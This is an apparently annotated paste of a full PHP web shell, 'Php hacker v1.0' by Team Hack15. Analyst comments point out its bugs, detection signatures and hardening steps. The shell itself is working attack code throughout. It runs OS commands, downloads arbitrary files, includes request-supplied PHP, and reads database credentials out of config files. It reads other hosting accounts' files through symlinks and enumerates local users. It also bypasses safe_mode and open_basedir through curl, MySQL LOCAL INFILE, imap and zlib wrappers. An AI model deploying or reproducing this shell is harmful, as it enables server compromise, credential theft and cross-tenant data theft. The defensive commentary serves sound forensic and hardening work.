1337_Brain

Php hacker v1.0

Jul 14th, 2014
  1. <?
  2. /*###########################################
  3. NameScrip : Php hacker v1.0
  4. Private For Hack15 Members ..
  5. Coder By GeNiUs HaCkEr - Team Hack15
  6. Mails : Linux@Nesma.Net.Sa & Vv9@Hotmail.Com
  7. WwW.Hack15.CoM                           
  8. ###########################################*/
  // Analyst note: bootstrap of a PHP web shell written for PHP 4/5-era hosts.
  // error_reporting(0) turns off all PHP error reporting, so failed actions leave
  // little or nothing in the PHP error log; look at web-server access logs instead.
  9. error_reporting(0);
  // set_magic_quotes_runtime() was removed in PHP 7.0, which dates the script.
  10. set_magic_quotes_runtime(0);
  // Compatibility shim for PHP older than 4.1.0: aliases the legacy $HTTP_*_VARS
  // arrays to $_POST, $_GET and $_SERVER.
  11. if(version_compare(phpversion(), '4.1.0') == -1)
  12.  {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
  13.  $_SERVER = &$HTTP_SERVER_VARS;
  // inclink($link, $val): returns the current REQUEST_URI with the query parameter
  // $link set to $val. If "$link", "showsc" or "hlp" already occurs in the URI,
  // everything from that parameter to the end of the string is replaced (the
  // character class matches any character); otherwise "$link=$val" is appended
  // with "&" or "?". $link is interpolated into the pattern without preg_quote()
  // and the result is returned unescaped; the one caller in this paste prints it
  // into an unquoted href attribute.
  14.  }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  15. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  16. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  17. else{return $requ."?".$link."=".$val;}}
  // delm($delmtxt): prints a centered one-row table used as a section heading.
  // $delmtxt is written into the HTML as-is; every call visible in this paste
  // passes a fixed string literal.
  18. function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid #008080' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=#008080>$delmtxt</td></tr></table></center>";}
  // callfuncs($cmnd): passes $cmnd to an operating-system command primitive and
  // prints the output through htmlspecialchars(). The branches name shell_exec,
  // exec, popen, system and passthru; for hardening, all five belong in
  // disable_functions, since removing only one leaves the others available.
  // NOTE(review): each elseif tests the function named in the previous branch,
  // not the one it is about to call, so branch selection does not track which
  // primitive is actually available.
  // No call to callfuncs() is visible in this paste.
  19. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  20. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  21. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  22. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  23. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  24. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  25. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  26. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  27. ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
  28. print htmlspecialchars($pret);}}
  // input($type, $name, $value, $size): prints one <input> element. Which
  // attributes are emitted depends on which of $value, $name and $size are
  // empty(). Attribute values are neither quoted nor HTML-escaped; the callers in
  // this paste pass the current working directory as $value, so a directory name
  // containing spaces or markup breaks out of the attribute.
  29. function input($type,$name,$value,$size)
  30. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  31. elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
  32. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  33. else {print "<input type=$type name=$name value=$value size=$size >";}}
  // permcol($path): wraps the output of callperms($path) in a <font> tag whose
  // colour reflects access for the web-server user: #008080 when the path is
  // writable, red when it is neither readable nor writable, white otherwise (the
  // white branch leaves its <font> tag unclosed).
  // callperms() is not defined anywhere in this paste and permcol() is never
  // called here; presumably both are leftovers from a larger shell.
  34. function permcol($path){if (is_writable($path)){print "<font color=#008080>";
  35. callperms($path); print "</font>";}
  36. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
  37. callperms($path); print "</font>";}
  38. else {print "<font color=white>";callperms($path);}}
  // Download entry point. $dlink is never assigned in this paste, so the check
  // presumably relies on register_globals mapping a request parameter to the
  // variable (register_globals was removed in PHP 5.4).
  39. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  // download($dwfile): sends the file at $dwfile as an attachment and exits.
  // The path comes straight from the request with no validation, so any file the
  // web-server user can read can be retrieved. The same value is interpolated
  // into the Content-Type and Content-Disposition headers. The @ operator hides
  // header() and readfile() failures.
  // Detection: requests carrying a `dwld` parameter whose value is a filesystem
  // path, answered with Content-Type "application/force-download".
  40. function download($dwfile) {$size = filesize($dwfile);
  41. @header("Content-Type: application/force-download;name=$dwfile");
  42. @header("Content-Transfer-Encoding: binary");
  43. @header("Content-Length: $size");
  44. @header("Content-Disposition: attachment; filename=$dwfile");
  45. @header("Expires: 0");
  46. @header("Cache-Control: no-cache, must-revalidate");
  47. @header("Pragma: no-cache");
  48. @readfile($dwfile); exit;}
  49. ?>
  50. <html>
  51. <head><title>Hack15Shell</title></head>
  52. <style>
  53. BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: #008080; }
  54. a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
  55. a:hover{color:#008080}
  56. input{FONT-WEIGHT:normal;background-color: #191919;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
  57. textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
  58. div{font-size:12px;font-family:tahoma;font-weight:normal;color:whitesmoke}
  59. select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
  60. <body bgcolor=black text=white><font face="sans ms" size=3>
  61. </body>
  62. </html>
  63. <?
  // Working directory: when the request carries `scdir`, the script chdir()s to
  // that request-supplied path; $nscdir then holds getcwd() either way. Every
  // form further down re-submits $nscdir in a hidden `scdir` field.
  64. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  // Reusable HTML fragments (form, table, cell, textarea and font open/close
  // tags) that the page-rendering code concatenates.
  65. $sf="<form method=post>";$ef="</form>";
  66. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  67. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  68. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  69. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  70. $sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
  // Operator-edited settings. $mhost/$muser/$mpass/$mdb are the MySQL connection
  // values used by the `ssql` handler; $them/$you/$folder/$flib build the two
  // /home/<account>/public_html paths used by the `sym` handler. $mysql_use is
  // assigned here but never read in the visible code. The values shown are the
  // template's placeholders; a copy recovered from a host may hold real
  // credentials and account names, which are useful scoping evidence.
  71. ################# Editing By User ########################
  72. ///////////////////////////////
  73.                              //
  74. $mysql_use = "no"; //"yes"   //
  75. $mhost = "localhost";        //
  76. $muser = "root";             //
  77. $mpass = "pass";             //
  78. $mdb = "name";               //
  79. $them = "xxx"; //any site    //
  80. $you = "xx"; //your username //
  81. $flib = "hack15.txt";        //
  82. $folder = "hack15.txt";      //
  83. ///////////////////////////////
  84. ################# PhP Design (Start) ########################
  // Page banner. The literal strings printed here ("Php Hacker v1.0 (Shell)",
  // "[ Php hacker v1.0 ]::[ Owned By Yourname ]", "Gr33tz To") and the
  // <title>Hack15Shell</title> in the static HTML are stable content signatures
  // for file scanning and for matching HTTP response bodies.
  85. delm(": Php Hacker v1.0 (Shell) :");
  86. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=white size=4>[ Php hacker v1.0 ]::[ Owned By Yourname ]
  87. </font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  88. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('linux', 'greet').">Gr33tz To</a>";
  89. print " - <a href='javascript:history.back()'>Back</a>";
  90. print "</td></tr></table>";
  91. echo "<br>";
  92. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  // Reads the safe_mode ini setting and displays it as ON/OFF. $safemode is set
  // but not read again in the visible code. safe_mode was removed in PHP 5.4, so
  // on later versions ini_get() returns false and the page always reports OFF.
  93. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  94.     {
  95.      $safemode = true;
  96.      $hsafemode = "<font color=\"red\">ON (secure)</font>";
  97.     }
  98.     else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  99.     echo("Safe-mode: $hsafemode");
  100. print "</td></tr></table>";
  101. echo "<br>";
  102. ################# PhP Hacked ########################
  // Prints a fixed credits list in a textarea when $linux equals 'greet'.
  // $linux is never assigned in this paste; the banner link sets a `linux=greet`
  // query parameter, so this presumably depends on register_globals.
  103. // read greet //
  104. if ($linux=='greet')
  105. {
  106. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  107. echo "GeNiUs HaCkEr & Blood Hacker & Mr.ALJoOoKeR & Dr_Whad_Drb & Saudi Hunter & Saudi Coder &  ROMANCY-HACKER & Qatil_Albasik & Caeser & KsA HaCkEr & Hacker Zero & Mr.Shares & Dr.Shares
  108. ";
  109.   echo "</textarea>";
  110. }
  // Handler stub for POST field `sorce`: both branches are empty, so the field
  // has no effect in this version of the script.
  111. // read file unzend sorce //
  112. if(empty($_POST['sorce'])){
  113. } else {
  114.  
  115. }
  // Handler for POST field `func`: require()s the request-supplied path, which
  // executes that file as PHP inside this script, then prints three entries of
  // whatever $config array the included file defined: database name, username and
  // password. The key layout appears to match a vBulletin-style config.php
  // (assumption; verify against the application on the affected host).
  // Response: any database credentials stored in PHP config files readable by
  // the web-server user should be considered disclosed and rotated.
  116.  if(empty($_POST['func'])){
  117. } else {
  118. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  119. $zeen=$_POST['func'];
  120. require("$zeen");
  121. echo "Database : ".$config['Database']['dbname']." <X> ";
  122. echo "UserName : ".$config['MasterServer']['username']." <X> ";
  123. echo "Password : ".$config['MasterServer']['password']." <X> ";
  124. echo "</textarea></p>";
  125. }// read file symlink ( ) //
  // Handler for POST field `sym` (the posted value is only tested for being
  // non-empty). Cross-account read on shared hosting: the script creates a
  // symlink inside the operator's own public_html that points at a path inside
  // another account's public_html, then fetches the link over HTTP so the web
  // server, not PHP, opens the target. $k (the target-relative path) is never
  // assigned in this paste; presumably it arrives through register_globals.
  // Artifacts: a file "hack15.txt" containing "Php Hacker Was Here" in the
  // script's working directory, and symlinks under public_html whose targets lie
  // in a different /home/<account>/ tree.
  // Hardening: Apache `SymLinksIfOwnerMatch` instead of `FollowSymLinks`,
  // `symlink` in disable_functions, and per-account filesystem isolation.
  127. if(empty($_POST['sym'])){
  128. } else {
  129. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  // Marker file; the handle $fp is never closed in the visible code.
  130. $fp = fopen("hack15.txt","w+");
  131. fwrite($fp,"Php Hacker Was Here");
  132. @unlink($flib);
  133. $sym = "/home/" . $them . "/public_html/" . $k;
  134. $link = "/home/"  . $you . "/public_html/" . $folder . "/" . $flib;
  135. @symlink($sym, $link);
  // Curly-brace string offsets ($k{0}) were removed in PHP 8.0.
  136. if ($k{0} == "/") {
  137. echo "<script> window.location = '" . $flib . "'</script>";
  138. }else{
  139. echo "<pre><xmp>";
  140. echo readlink($flib) . "\n";
  141. echo "Filesize: " . linkinfo($flib) . "B\n\n";
  // The link is read back through the site's own HTTP endpoint (Host header
  // taken from the request), so the access appears in the access log as a
  // request from the server to itself.
  142. echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/"  . $folder . "/" . $flib);
  143.   echo "</textarea>";
  144. }
  145. }
  146.  
  // Handler for POST field `plugin`: calls posix_getpwuid() for every UID from 0
  // to 59999 and prints each returned field followed by ":". This lists local
  // accounts (name, uid, gid, home, shell) without opening /etc/passwd, so
  // open_basedir-style file restrictions do not apply to it.
  // Hardening: add `posix_getpwuid` to disable_functions where the POSIX
  // extension is not needed. each() was removed in PHP 8.0.
  147. // read file plugin ( ) //
  148. if(empty($_POST['plugin'])){
  149. } else {
  150. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  151. for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  152.  $ara = posix_getpwuid($uid);
  153.   if (!empty($ara)) {
  154.        while (list ($key, $val) = each($ara)){
  155.         print "$val:";
  156.   }
  157.   print "\n";
  158.      }
  159.   }
  160.   echo "</textarea>";
  161. }
  // Handler for POST field `rid`: the same posix_getpwuid() account enumeration
  // as the `plugin` handler (UIDs 0 to 59999, fields printed colon-separated).
  162. // read file id ( ) //
  163. if ($_POST['rid'] ){
  164. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  165.  for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  166. $ara = posix_getpwuid($uid);
  167.  if (!empty($ara)) {
  168. while (list ($key, $val) = each($ara)){
  169. print "$val:";
  170. }
  171.  print "\n";
  172. }
  173.  }
  174. echo "</textarea>";
  // This `break` sits inside an `if`, not a loop or switch; PHP 7 and later
  // reject that at compile time, so the whole file fails to load there.
  175. break;
  176.  
  177.  }
  // Handler for POST field `rimap`: passes the request-supplied string to
  // imap_open() as the mailbox with empty credentials, then reads message 1 with
  // imap_body(). The IMAP library opens local mailbox paths itself, outside PHP's
  // own file-access checks. The result is stored in $str and never printed in the
  // visible code.
  // Hardening: do not load the imap extension on hosts that do not need it, or
  // add imap_open to disable_functions.
  178. // read file imap ( ) //
  179. $string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0;
  180. if(empty($_POST['rimap'])){
  181. } else {
  182. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  183. $stream = imap_open($string, "", "");
  184. $str = imap_body($stream, 1);
  185. echo "</textarea>";
  186. }
  // Handler for POST field `curl`: builds a file:// URL from the request-supplied
  // path, followed by a NUL byte ("\x00") and a traversal suffix ending in this
  // script's own path, and hands it to cURL. This is the historic NUL-byte trick
  // against path checks in old PHP/libcurl builds: the check saw the allowed
  // suffix while the library stopped at the NUL. curl_exec() is called twice;
  // CURLOPT_RETURNTRANSFER is not set, so the first call writes the content
  // straight to the response.
  // Detection: POST bodies with a `curl` field holding a filesystem path.
  // Hardening: keep PHP and libcurl patched; current PHP rejects NUL bytes in
  // path arguments.
  187. // read file Curl ( ) //
  188. if(empty($_POST['curl'])){
  189. } else {
  190. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  191. $m=$_POST['curl'];
  192. $ch =
  193. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  194. curl_exec($ch);
  195. var_dump(curl_exec($ch));
  196. echo "</textarea>";
  197. }
  198.  
  // Handler for POST field `ssql`: reads a file through the MySQL client instead
  // of PHP's file functions. LOAD DATA LOCAL INFILE makes the client library (on
  // the web server) open the request-supplied path and send it to the database,
  // where it lands in a one-column temporary table and is selected back. The
  // field and line terminators are set to a string that should never occur, so
  // the whole file becomes a single value.
  // Uses $mhost/$muser/$mpass/$mdb from the operator settings; $file is
  // interpolated into the statement unescaped. The mysql_* extension was removed
  // in PHP 7.0.
  // Hardening: disable LOCAL INFILE on the client side (mysql.allow_local_infile /
  // mysqli.allow_local_infile = Off) and on the server (local_infile = 0).
  199. // read file SQL ( ) //
  200. if(empty($_POST['ssql'])){
  201. } else {
  202. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  203. $file=$_POST['ssql'];
  204.  
  205.  
  // $mysql_files_str / $mysql_files are built here but not used afterwards in
  // the visible code.
  206. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  207. $mysql_files = explode(':', $mysql_files_str);
  208.  
  // Statement list; the temporary table name is "A" followed by the current
  // Unix timestamp.
  209. $sql = array (
  210. "USE $mdb",
  211. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  212. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  213. . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
  214. . "ESCAPED BY          '' "
  215. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  216.  
  217. "SELECT a FROM $tbl LIMIT 1"
  218. );
  219. mysql_connect ($mhost, $muser, $mpass);
  220.  
  // Runs the statements in order; a failing statement aborts the page with the
  // statement text and the MySQL error, and only statements that return a row
  // produce output (HTML-escaped).
  221.                                 foreach ($sql as $statement) {
  222.                                    $q = mysql_query ($statement);
  223.  
  224.                                    if ($q == false) die (
  225.                                       "FAILED: " . $statement . "\n" .
  226.                                       "REASON: " . mysql_error () . "\n"
  227.                                    );
  228.  
  229.                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  230.  
  231.                                    echo htmlspecialchars($r[0]);
  232.                                    mysql_free_result ($q);
  233.                                 }
  234. echo "</textarea>";
  235. }
  236.  
  237.  
  238.  
  // Two request handlers share these lines.
  // `safefile`: copies "compress.zlib://<path>" to a temp file created by
  // tempnam() (prefix "cx"), prints the copy HTML-escaped, then deletes it. The
  // stream-wrapper prefix is the historic way around safe_mode checks applied to
  // plain paths. If `safefile` is empty the path falls back to GET or POST `file`.
  // `inifile`: calls ini_restore() on safe_mode and open_basedir, then include()s
  // the request-supplied path. include() executes the file as PHP rather than
  // merely displaying it, and htmlspecialchars() on a path is not validation.
  // Both apply only to PHP builds that still have safe_mode (removed in 5.4).
  // Artifacts: short-lived "cx*" files in the system temp directory.
  239. // read file copy & ini ( ) //
  240. if (isset ($_REQUEST['safefile'])){
  241. $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
  242. if(empty($_GET['file'])){if(empty($_POST['file'])){
  243. print "<center>[ Please choose a file first to read it using copy() ]</center>";
  244. } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
  245. $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
  246. $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
  247. fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
  248. print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
  249. </CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
  250. ini_restore("safe_mode");ini_restore("open_basedir");
  251. print "<center><pre>".$sta;
  252. if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
  // Renders the "Safe mode bypass" panel: eight POST forms laid out two per
  // table. Each form has one text field, prefilled with the current directory,
  // a hidden `scdir` field carrying the same directory, and a "Read-F" submit
  // button. The text-field names are the parameters the handlers key on and make
  // a compact request signature for WAF and log searches:
  // safefile, inifile, ssql, curl, rimap, rid, plugin, sym (each alongside scdir).
  253. delm(": Safe mode bypass :");
  254. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  255. print "<tr><td width=50%><div align=left>";
  // Form: `safefile` (copy() handler).
  256. print $st.$c1."<div><b><center>Using copy() function</div>";
  257. print $ec.$c2.$sf."&nbsp;";
  258. input("text","safefile",$nscdir,75);
  259. input("hidden","scdir",$nscdir,0);print " ";
  260. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  261. print "</td><td height=20% width=50%><div align=right>";
  // Form: `inifile` (ini_restore() + include handler).
  262. print $st.$c1."<div><b><center>Using ini_restore() function</div>";
  263. print $ec.$c2.$sf."&nbsp;";
  264. input("text","inifile",$nscdir,75);
  265. input("hidden","scdir",$nscdir,0);print " ";
  266. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  267. print "</td></tr></table>";
  268. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  269. print "<tr><td width=50%><div align=left>";
  // Form: `ssql` (MySQL LOAD DATA LOCAL INFILE handler).
  270. print $st.$c1."<div><b><center>Using sql() function</div>";
  271. print $ec.$c2.$sf."&nbsp;";
  272. input("text","ssql",$nscdir,75);
  273. input("hidden","scdir",$nscdir,0);print " ";
  274. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  275. print "</td><td height=20% width=50%><div align=right>";
  // Form: `curl` (file:// handler).
  276. print $st.$c1."<div><b><center>Using Curl() function</div>";
  277. print $ec.$c2.$sf."&nbsp;";
  278. input("text","curl",$nscdir,75);
  279. input("hidden","scdir",$nscdir,0);print " ";
  280. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  281. print "</td></tr></table>";
  282. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  283. print "<tr><td width=50%><div align=left>";
  // Form: `rimap` (imap_open() handler).
  284. print $st.$c1."<div><b><center>Using imap() function</div>";
  285. print $ec.$c2.$sf."&nbsp;";
  286. input("text","rimap",$nscdir,75);
  287. input("hidden","scdir",$nscdir,0);print " ";
  288. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  289. print "</td><td height=20% width=50%><div align=right>";
  // Form: `rid` (posix_getpwuid() enumeration).
  290. print $st.$c1."<div><b><center>Using id() function</div>";
  291. print $ec.$c2.$sf."&nbsp;";
  292. input("text","rid",$nscdir,75);
  293. input("hidden","scdir",$nscdir,0);print " ";
  294. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  295. print "</td></tr></table>";
  296. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  297. print "<tr><td width=50%><div align=left>";
  // Form: `plugin` (posix_getpwuid() enumeration).
  298. print $st.$c1."<div><b><center>Using plugin() function</div>";
  299. print $ec.$c2.$sf."&nbsp;";
  300. input("text","plugin",$nscdir,75);
  301. input("hidden","scdir",$nscdir,0);print " ";
  302. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  303. print "</td><td height=20% width=50%><div align=right>";
  // Form: `sym` (symlink handler).
  304. print $st.$c1."<div><b><center>Using symlink() function</div>";
  305. print $ec.$c2.$sf."&nbsp;";
  306. input("text","sym",$nscdir,75);
  307. input("hidden","scdir",$nscdir,0);print " ";
  308. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  309. print "</td></tr></table>";
  // Renders the "Unzend Config" panel: one POST form whose text field `func`
  // feeds the require()-based config reader, plus the hidden `scdir` field.
  310. delm(": Unzend Config :");
  311. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  312. print "<tr><td width=50%><div align=left>";
  313. print $st.$c1."<div><b><center>Connect To Functions Of Config</div>";
  314. print $ec.$c2.$sf."&nbsp;";
  315. input("text","func",$nscdir,75);
  316. input("hidden","scdir",$nscdir,0);print " ";
  317. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  318. print "</td></tr></table>";
  319. ?><?
  // Footer with author credit and a link to the group's site; the literal text
  // is another fixed string usable in content signatures.
  320. print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";
  321. print"<tr><td><font size=2 face=tahoma>";
  322. print"<center>Coder By GeNiUs HaCkEr <br>[ Team Hack15 :: Go to : <a target='_blank' href='http://www.Hack15.com'>Http://Hack15.com</a> ]";
  323. print"</font></td></tr></table>";
  324. ?>